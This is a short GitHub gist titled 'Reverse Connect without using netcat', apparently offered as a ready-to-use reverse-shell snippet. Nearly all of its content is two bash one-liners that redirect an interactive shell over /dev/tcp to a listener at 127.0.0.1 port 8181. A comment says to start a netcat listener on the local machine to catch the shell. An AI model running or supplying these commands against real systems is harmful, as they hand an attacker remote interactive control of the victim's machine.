Created
August 13, 2020 14:11
-
-
Save enderphan94/3e49e67e7462d2852110e611b305f3b3 to your computer and use it in GitHub Desktop.
Reverse Connect without using netcat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/bin/bash -c '/bin/bash -i > /dev/tcp/127.0.0.1/8181 0<&1 2>&1&' | |
# OR | |
/bin/bash -i >& /dev/tcp/127.0.0.1/8181 0>&1 | |
#run `nc -vnlp 8181` on your local machine |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment